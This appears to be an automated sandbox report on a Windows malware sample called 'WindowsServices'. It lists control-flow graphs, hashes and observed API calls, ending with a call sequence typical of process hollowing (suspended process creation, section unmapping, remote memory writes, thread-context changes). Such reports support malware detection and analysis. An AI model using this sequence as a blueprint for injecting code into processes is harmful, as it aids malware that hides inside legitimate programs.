                                                                        • Instruction ID: 547190e9c940163dfc6050213713ada61b9d78a7cc5ea9f155db66e10a871a42
                                                                        • Opcode Fuzzy Hash: e82165eb6c0ad51d24d0eb0a35662d3232888ae1edbdff6aa0d5cfa0474ea267
                                                                        • Instruction Fuzzy Hash: 6C3193B55093806FE712CB25DD49B96BFF8EF06314F08849AE984CF292D375A909C772
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 152 d7a361-d7a3cf 155 d7a3d4-d7a3dd 152->155 156 d7a3d1 152->156 157 d7a3e2-d7a3e8 155->157 158 d7a3df 155->158 156->155 159 d7a3ed-d7a404 157->159 160 d7a3ea 157->160 158->157 162 d7a406-d7a419 RegQueryValueExW 159->162 163 d7a43b-d7a440 159->163 160->159 164 d7a442-d7a447 162->164 165 d7a41b-d7a438 162->165 163->162 164->165
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,E5CF74EA,00000000,00000000,00000000,00000000), ref: 00D7A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 52525a3523cfe79c883b900e01da345d0a8f3409a6a954c8f6d1022958451a3f
                                                                        • Instruction ID: c7494ac19aab5bde0e9c323985a769029074d68ee9f08855a2a1145061a706e5
                                                                        • Opcode Fuzzy Hash: 52525a3523cfe79c883b900e01da345d0a8f3409a6a954c8f6d1022958451a3f
                                                                        • Instruction Fuzzy Hash: AB3184755057405FE721CF15DC84F96BFF8EF45710F08849AE9458B292D364E909CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 169 d7a462-d7a4c3 172 d7a4c5 169->172 173 d7a4c8-d7a4d4 169->173 172->173 174 d7a4d6 173->174 175 d7a4d9-d7a4f0 173->175 174->175 177 d7a527-d7a52c 175->177 178 d7a4f2-d7a505 RegSetValueExW 175->178 177->178 179 d7a507-d7a524 178->179 180 d7a52e-d7a533 178->180 180->179
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,E5CF74EA,00000000,00000000,00000000,00000000), ref: 00D7A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 3a5451ad4340da212bc97a15d220923f67122716318311230928604f1178beed
                                                                        • Instruction ID: 7865e58605b6693d4a6272999d2bf5a200bdeafa4f0afbd41fd9311b46c289a2
                                                                        • Opcode Fuzzy Hash: 3a5451ad4340da212bc97a15d220923f67122716318311230928604f1178beed
                                                                        • Instruction Fuzzy Hash: 792192B25043806FD7228F15DD44FA7BFB8EF46724F08849AE949CB692D264E948CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 210 d7abc6-d7ac15 213 d7ac17 210->213 214 d7ac1a-d7ac23 210->214 213->214 215 d7ac25 214->215 216 d7ac28-d7ac31 214->216 215->216 217 d7ac33-d7ac3b CreateMutexW 216->217 218 d7ac82-d7ac87 216->218 219 d7ac41-d7ac57 217->219 218->217 221 d7ac89-d7ac8e 219->221 222 d7ac59-d7ac7f 219->222 221->222
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00D7AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: be7d27db71f05e4ff0bd8608493d3d7285908a46ec04188ae87a8f0f811ad29b
                                                                        • Instruction ID: 86fa5879c1fd60ed8e652227cb835bf7344b3347bf120ec5f7dcb1332f7dbf24
                                                                        • Opcode Fuzzy Hash: be7d27db71f05e4ff0bd8608493d3d7285908a46ec04188ae87a8f0f811ad29b
                                                                        • Instruction Fuzzy Hash: F6218375500200AFE721DF29DD49BA6FBE8EF44324F18C859ED488B741E375E908CA72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 197 d7a67b-d7a6d5 199 d7a6d7 197->199 200 d7a6da-d7a6e0 197->200 199->200 201 d7a6e5-d7a6ee 200->201 202 d7a6e2 200->202 203 d7a731-d7a736 201->203 204 d7a6f0-d7a6f8 LookupPrivilegeValueW 201->204 202->201 203->204 206 d7a6fe-d7a710 204->206 207 d7a712-d7a72e 206->207 208 d7a738-d7a73d 206->208 208->207
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00D7A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: ac00f817536452730f9a7988074a4ca16251cd4c4c087d02129b4975e1112209
                                                                        • Instruction ID: 683a673e49ee6a5e54cfce4bab31d259beeb28dee309c878840f423d601b7212
                                                                        • Opcode Fuzzy Hash: ac00f817536452730f9a7988074a4ca16251cd4c4c087d02129b4975e1112209
                                                                        • Instruction Fuzzy Hash: 2221A1755093805FDB128B65DC95B96BFF8AF06320F0D84DAE984CB293E224D808C772
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 225 d7a392-d7a3cf 227 d7a3d4-d7a3dd 225->227 228 d7a3d1 225->228 229 d7a3e2-d7a3e8 227->229 230 d7a3df 227->230 228->227 231 d7a3ed-d7a404 229->231 232 d7a3ea 229->232 230->229 234 d7a406-d7a419 RegQueryValueExW 231->234 235 d7a43b-d7a440 231->235 232->231 236 d7a442-d7a447 234->236 237 d7a41b-d7a438 234->237 235->234 236->237
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,E5CF74EA,00000000,00000000,00000000,00000000), ref: 00D7A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 8c325651e64566d7c044c1f62abf6da7a6b20c0b612e975bfd5c297a79386198
                                                                        • Instruction ID: 23a8ca1ec1d3b34d68dfe93b54a9acd686fd8105a252bd385b53ffd8d504cb93
                                                                        • Opcode Fuzzy Hash: 8c325651e64566d7c044c1f62abf6da7a6b20c0b612e975bfd5c297a79386198
                                                                        • Instruction Fuzzy Hash: 0D2190B5600204AFE720CF55DD88FA6F7ECEF44724F08C45AED4A8B651E365E809CA72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (basic block: address range, API called in block, successors)
                                                                        241 d7a960-d7a9c4 -> 243, 244
                                                                        243 d7aa07-d7aa0c -> 244
                                                                        244 d7a9c6-d7a9ce FindCloseChangeNotification -> 245
                                                                        245 d7a9d4-d7a9e6 -> 247, 248
                                                                        247 d7aa0e-d7aa13 -> 248
                                                                        248 d7a9e8-d7aa04 (no successors)
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00D7A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: e3174dcfe4e3fd00699c2672c48891575b4f79398ea8c6fdfe9a5d948a865e6e
                                                                        • Instruction ID: 0f004be268286cf4d2f6f3180cd4c929e8dc62bafcf801f0f1cf5e87c963a67c
                                                                        • Opcode Fuzzy Hash: e3174dcfe4e3fd00699c2672c48891575b4f79398ea8c6fdfe9a5d948a865e6e
                                                                        • Instruction Fuzzy Hash: 9B21D1725093C05FDB128B25DD54A92BFB4AF07324F0C84DAEC858F663D234A908CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (basic block: address range, API called in block, successors)
                                                                        250 d7a486-d7a4c3 -> 252, 253
                                                                        252 d7a4c5 -> 253
                                                                        253 d7a4c8-d7a4d4 -> 254, 255
                                                                        254 d7a4d6 -> 255
                                                                        255 d7a4d9-d7a4f0 -> 257, 258
                                                                        257 d7a527-d7a52c -> 258
                                                                        258 d7a4f2-d7a505 RegSetValueExW -> 259, 260
                                                                        259 d7a507-d7a524 (no successors)
                                                                        260 d7a52e-d7a533 -> 259
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,E5CF74EA,00000000,00000000,00000000,00000000), ref: 00D7A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: ecda56e7e270158c81327b77f50755814fa084208a7d16e3089641c43f283af8
                                                                        • Instruction ID: e58cd8300f3e25775a4467b11df48dc8df04ab57b6346819dbb008d552e2539a
                                                                        • Opcode Fuzzy Hash: ecda56e7e270158c81327b77f50755814fa084208a7d16e3089641c43f283af8
                                                                        • Instruction Fuzzy Hash: BF1184B65006009FE7218F15DD49FABBBECEF44714F08C45AED498A651E375E848CA72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (basic block: address range, API called in block, successors)
                                                                        272 d7a6ae-d7a6d5 -> 273, 274
                                                                        273 d7a6d7 -> 274
                                                                        274 d7a6da-d7a6e0 -> 275, 276
                                                                        275 d7a6e5-d7a6ee -> 277, 278
                                                                        276 d7a6e2 -> 275
                                                                        277 d7a731-d7a736 -> 278
                                                                        278 d7a6f0-d7a6f8 LookupPrivilegeValueW -> 280
                                                                        280 d7a6fe-d7a710 -> 281, 282
                                                                        281 d7a712-d7a72e (no successors)
                                                                        282 d7a738-d7a73d -> 281
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00D7A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 69e6692044fbe9fb66143c7358ed9798a524c929820f1e3e05f3d7b6f678d59b
                                                                        • Instruction ID: 4c26a7bb560d6c2393ef75ecef7cefc7ca47257b649c23e5e956583ffd37b0c5
                                                                        • Opcode Fuzzy Hash: 69e6692044fbe9fb66143c7358ed9798a524c929820f1e3e05f3d7b6f678d59b
                                                                        • Instruction Fuzzy Hash: DF1165756046408FEB20DF19D989B5AFBE8EF54320F1CC46ADD49CB741E274D844CA72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (basic block: address range, API called in block, successors)
                                                                        284 d7a5e4-d7a62c -> 286, 287
                                                                        286 d7a62e-d7a636 FindCloseChangeNotification -> 289
                                                                        287 d7a66d-d7a672 -> 286
                                                                        289 d7a63c-d7a64e -> 290, 291
                                                                        290 d7a674-d7a679 -> 291
                                                                        291 d7a650-d7a66c (no successors)
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00D7A634
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 39390c1a0f0db3d80ee455689dfc99490f2935d921e47902511ef34b69efb8c7
                                                                        • Instruction ID: 5fb9a20fb664b5a5faa16109c9690fcbaa9d6783fe4cf933130428c3a0272d59
                                                                        • Opcode Fuzzy Hash: 39390c1a0f0db3d80ee455689dfc99490f2935d921e47902511ef34b69efb8c7
                                                                        • Instruction Fuzzy Hash: 5011C2715053809FDB118F25DC84B56BFE8EF46320F08C4EAED498F262D274A918CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00D7A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 8fe514485457fbc8d5da809a3aaee2746c01679fdf1cdc7a93a010590b64489f
                                                                        • Instruction ID: 5ad30cc859509b98aaad41304e9c0cecd761b93085e526f1eb41680a8dcf7b62
                                                                        • Opcode Fuzzy Hash: 8fe514485457fbc8d5da809a3aaee2746c01679fdf1cdc7a93a010590b64489f
                                                                        • Instruction Fuzzy Hash: 7301B1715006408FDB109F19D988B56FBE4EF44324F08C4AADD498BA42E374E818CF72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00D7A634
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 2bc7638e81b939e8fa7c08f2577dd1981122a96deda49e58c88d8250d937c4b9
                                                                        • Instruction ID: 8805ead25f7202fb3dd4b373b5bebd0a747bff89a02acf42381532bdfd1411c5
                                                                        • Opcode Fuzzy Hash: 2bc7638e81b939e8fa7c08f2577dd1981122a96deda49e58c88d8250d937c4b9
                                                                        • Instruction Fuzzy Hash: BB01D4755006008FDB108F19D988769FBD4EF44320F0CC4AADD498B752E274D808CE72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1855643584.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_fa0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d4354ee40f85fcf80d69b234fb5dba483e1e20b6baf4c6cb049423a144b23153
                                                                        • Instruction ID: 64292902b173132940be2d6692764ed3673d0608aac05badf1f7b5b736ca8015
                                                                        • Opcode Fuzzy Hash: d4354ee40f85fcf80d69b234fb5dba483e1e20b6baf4c6cb049423a144b23153
                                                                        • Instruction Fuzzy Hash: 864134306162468FC704FF39E79948977B2AB8520C7848829D4449FF6EFFB85909CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1855643584.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_fa0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 43bc202fb2228e7f0c05a86fd5be0ad25b9c9f9c3bb3ccc95e6a9235fa6d60a3
                                                                        • Instruction ID: bac8d066c5542cc8136811585d00f6fbd17b724c25fd783fdb23c789dd4f7965
                                                                        • Opcode Fuzzy Hash: 43bc202fb2228e7f0c05a86fd5be0ad25b9c9f9c3bb3ccc95e6a9235fa6d60a3
                                                                        • Instruction Fuzzy Hash: 26018C2470D3C04FC317677898799697F669B8325570984EFD4849B3E3CA78484AC7B2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1855643584.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_fa0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1f94fcfca36f667fca8473090b55b637dc94dc2a1496d7ebac7e07ffb95421af
                                                                        • Instruction ID: 9a5e95cd3313d3841d8b2998c484e0c10c730c8030adaca316fad50f6108d810
                                                                        • Opcode Fuzzy Hash: 1f94fcfca36f667fca8473090b55b637dc94dc2a1496d7ebac7e07ffb95421af
                                                                        • Instruction Fuzzy Hash: 2501D86450E7C29FCB8347708CB94557FB0AD0B22136A44CBC8C5CB1B3DA69181EEB23
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1826006002.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_ef0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 97283ead9be362dafaae76912a3c585d1c6e704ff1016e5d9cef6f31d7872202
                                                                        • Instruction ID: a03940f0a10c28cc83c2ec4099f9a867080278b934737e50f820112a4ef5127b
                                                                        • Opcode Fuzzy Hash: 97283ead9be362dafaae76912a3c585d1c6e704ff1016e5d9cef6f31d7872202
                                                                        • Instruction Fuzzy Hash: 3AF086B65093845FDB118B069C44862FFE8EB86630709C49BEC4987652D265A908CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1826006002.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_ef0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eed34f211aa0f711c99aef9252b61593ac6f18f54ef70afb90e82e1b2732ce8a
                                                                        • Instruction ID: be901f2c047fa78dbcd6350a94c2ab8ca9eb660351241c330f6461bfed2d3735
                                                                        • Opcode Fuzzy Hash: eed34f211aa0f711c99aef9252b61593ac6f18f54ef70afb90e82e1b2732ce8a
                                                                        • Instruction Fuzzy Hash: 7BE092B66006044B9A50DF0AEC85862FBD8EB88630B08C47FDC0D8B701E276B508CEB5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821649206.0000000000D72000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D72000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d72000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bbd3d7fee9f49f916143e55c0a9b933236e1f16dc0d041aa4a94df569bb80c19
                                                                        • Instruction ID: ea729a0a05d5c33efa4da76786edf54170ddef18acdaf880bc56cef80e271f18
                                                                        • Opcode Fuzzy Hash: bbd3d7fee9f49f916143e55c0a9b933236e1f16dc0d041aa4a94df569bb80c19
                                                                        • Instruction Fuzzy Hash: 34D02E3A2006C08FD3128A0CC2A9FA537D4AB60708F0A80F9A8008B763C728D880C210
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821649206.0000000000D72000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D72000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d72000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50cbe89175cca3377bf46c92651888ae3fd4b9a5d8649619cae4477dcfe39ed1
                                                                        • Instruction ID: a1b50d3ecb7536c3bc73f8abaaddd399341ec2b0e09912b215e433192e32f534
                                                                        • Opcode Fuzzy Hash: 50cbe89175cca3377bf46c92651888ae3fd4b9a5d8649619cae4477dcfe39ed1
                                                                        • Instruction Fuzzy Hash: 59D05E342006C14BCB15DA1CD2D8F6937D4AB44724F0A84ECAC108B762C7A8D8C0DA10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:17.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:1160
                                                                        Total number of Limit Nodes:13
execution_graph
APIs
• LoadLibraryA.KERNEL32(0000006B,?), ref: 004074E7
• GetProcAddress.KERNEL32(00000000), ref: 004074EA
• LoadLibraryA.KERNEL32(0000006B,?), ref: 004074FD
• GetProcAddress.KERNEL32(00000000), ref: 00407500
• LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407563
• LoadLibraryA.KERNELBASE(00000073,StcF), ref: 0040764D
• LoadLibraryA.KERNEL32(00000073,StcF), ref: 00407666
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040767C
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040768F
• LoadLibraryA.KERNEL32(advapi,RuV), ref: 0040769F
• LoadLibraryA.KERNEL32(advapi,RuV), ref: 004076B5
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076C5
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076D5
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076E5
• LoadLibraryA.KERNEL32(0000006B,?), ref: 004077AC
• LoadLibraryA.KERNEL32(0000006B,?), ref: 004077BC
• LoadLibraryA.KERNEL32(advapi,0000004F), ref: 004077CC
• LoadLibraryA.KERNEL32(advapi,?), ref: 004077E2
• LoadLibraryA.KERNEL32(advapi,Allocat), ref: 004077F8
• LoadLibraryA.KERNEL32(advapi,EqualSid), ref: 0040780E
• LoadLibraryA.KERNEL32(advapi,LookupAccountSidA), ref: 00407824
• LoadLibraryA.KERNEL32(0000006B,Clos), ref: 0040783A
• LoadLibraryA.KERNEL32(0000006B,?), ref: 0040784A
• LoadLibraryA.KERNEL32(0000006B,?), ref: 00407860
• LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407876
• LoadLibraryA.KERNELBASE(psapi.dll,?), ref: 00407A43
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00407AFB
• wcscpy.MSVCRT ref: 00407B17
• wcscpy.MSVCRT ref: 00407F50
• wcscat.MSVCRT ref: 00407F7A
• wcscpy.MSVCRT ref: 00407F8A
• wcscat.MSVCRT ref: 00407F9E
• wcscat.MSVCRT ref: 00408144
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040817F
• Wow64GetThreadContext.KERNEL32 ref: 004081A2
• NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 004081BE
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004081CF
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004081E0
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004081FF
• NtUnmapViewOfSection.NTDLL(?,?), ref: 0040820D
• VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00408288
• VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004082BF
• VirtualAllocEx.KERNELBASE(?,-FFF00000,00100000,00003000,00000040,?,00003000,00000040), ref: 004082EE
• WriteProcessMemory.KERNEL32(?,00000000,.dll,00000190,00000000,?,00003000,00000040), ref: 00408306
• WriteProcessMemory.KERNELBASE(?,00000000,.dll,?,00000000,?,00003000,00000040), ref: 00408317
• WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00003000,00000040), ref: 00408353
• WriteProcessMemory.KERNELBASE(?,0000002E,0000006B,?,00000000,?,00003000,00000040), ref: 004083C0
• WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,?,?,00003000,00000040), ref: 004083F5
• Wow64SetThreadContext.KERNEL32(?,00010007,?,00003000,00000040), ref: 0040841A
• WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 00408480
• ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 00408486
• Wow64SuspendThread.KERNEL32(?,?,00003000,00000040), ref: 00408490
• WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 004084B5
• wcscpy.MSVCRT ref: 00408760
• wcscat.MSVCRT ref: 00408774
• MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040878D
• CopyFileW.KERNELBASE(?,?,00000000), ref: 004087A3
• ResumeThread.KERNELBASE(?), ref: 004087FC
• Sleep.KERNELBASE(00000002), ref: 00408815
• CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00408837
• Module32First.KERNEL32(00000000,00000000), ref: 004088AC
• strstr.MSVCRT ref: 004088D6
• Wow64SuspendThread.KERNEL32(?), ref: 00408904
• Wow64SuspendThread.KERNEL32(?), ref: 0040891F
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408926
• DeleteFileW.KERNELBASE(?), ref: 00408930
• ResumeThread.KERNELBASE(?), ref: 00408949
• Sleep.KERNELBASE(00000002), ref: 0040894D
• DeleteFileW.KERNELBASE(?), ref: 00408956
• Wow64SuspendThread.KERNEL32(?), ref: 0040897B
• Sleep.KERNELBASE(00000005), ref: 0040898A
• MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
• ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 004089B3
• wcscat.MSVCRT ref: 00408A5B
• wcsstr.MSVCRT ref: 00408A82
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408AA2
• TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
• CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00408C6D
• CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00408C8E
• CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408CAF
• CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000005,00000000,00000000), ref: 00408CD2
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408CE1
• CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
• Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
• Process32Next.KERNEL32(00000000,00000128), ref: 00408DF1
• strstr.MSVCRT ref: 00408E02
• strstr.MSVCRT ref: 00408E16
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408E2E
• CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408FB8
• CreateFileA.KERNELBASE(00000000,00000000,00000002,00000000,00000003,00000000,00000000), ref: 00408FDA
• CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409030
• wcslen.MSVCRT ref: 00409045
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040906E
• wcscat.MSVCRT ref: 004090E9
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409108
• VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
• ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
